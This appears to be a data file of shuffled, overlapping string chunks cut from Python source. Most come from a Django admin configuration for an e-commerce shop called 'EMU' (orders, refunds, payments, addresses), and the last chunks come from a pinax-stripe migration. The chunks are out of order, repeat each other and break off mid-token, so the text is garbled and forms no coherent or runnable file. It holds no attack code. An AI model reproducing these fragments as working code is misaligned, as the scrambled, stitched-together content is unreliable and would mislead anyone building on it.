actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment',", "['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description =", "to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to", "from django.contrib import admin from django.utils.html import format_html # from django.contrib.auth.models import Group", "'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered',", "= ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display =", "'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links", "{'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code',", "['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets", "'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions =", "('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class", "actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass 
@admin.register(Profile) class ProfileAdmin(admin.ModelAdmin):", "('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested',", "('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery", "['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size)", "queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order',", "['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer',", "to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered',", "'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f''' <img", "= 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display", "CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received',", "class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter", "ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page", "django.contrib.auth.models import Group from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund,", "'refund_granted']}), ] 
@admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields =", "'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email',", "'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter =", "= ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date'", "('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total", "OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address',", "format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description", "CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted'", "class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header = \"EMU\"", "'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin):", "ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines", 
"CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered']", "actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code',", "list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy =", "granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category)", "['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}),", "'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}),", "Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display =", ".models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\", "'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date',", "AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter =", "refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin, request, queryset):", "'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [", "Address, Payment, Coupon, 
Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group)", "'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets =", "list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment',", "pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}),", "'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header", "fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered',", "# from django.contrib.auth.models import Group from .models import Product, CartProduct, Order, Address, Payment,", "'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp']", "'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields =", "refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True)", "search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address',", "Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset):", "orders to received' @admin.register(Category) class 
CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user',", "@admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines =", "Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin):", "'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user',", "list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default',", "refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req']", "make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin):", "CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size", "'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5", "return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True)", "= ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date'", "Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount", "{'fields': ['being_delivered', 
'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display", "{'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country',", "Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True)", "['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered", "'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address',", "'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address',", "'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass", "import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact,", "queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin, request,", "class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address',", "orders to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders", "'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy", "= 'date' 
@admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email',", "('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields =", "= [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date',", "list_per_page = 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe", "class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code',", "'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key',", "@admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header =", "Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status',", ") @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update", "queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order)", "'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user',", "{'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass", "= 'Update orders to refund granted' def 
make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description =", "'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received',", "['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def", "readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display", "\\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class", "['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display =", "'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f'''", "'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields", "@admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields':", "'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin):", "date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name',", "= ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason']", "list_display = ['order', 'ref_code', 
'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email',", "= ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address',", "date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [", "'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon',", "list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment',", "class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled',", "= ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount']", "'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class", "Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model", "'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin,", "'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets", "request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass" ]
[ "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)),", "null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document',", "], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False,", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2,", "'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True,", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()),", "models.CharField(default='usd', 
max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer',", "models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee',", "models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)),", "null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status',", "to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32,", "class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [", "models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received',", "models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': 
False, }, ),", "('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True,", "('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items',", "name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind',", "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind',", "('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee',", "max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at',", "decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd',", "('metadata', jsonfield.fields.JSONField(blank=True, 
null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)),", "models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True,", "models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract':", "null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type',", "null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at',", "), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)),", "False, }, ), migrations.CreateModel( name='Invoice', 
fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account',", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method',", "('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)),", "models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True,", "('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1',", "models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)),", "model_name='invoiceitem', name='plan', 
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[", "False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2,", "}, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True,", "), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', 
related_query_name='user_account',", "to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'),", "('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end',", "('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True,", "models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True,", "models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)),", "null=True)), ('currency', models.CharField(blank=True, default='usd', 
max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)),", "max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True,", "primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True,", "decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()),", "('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract':", "null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', 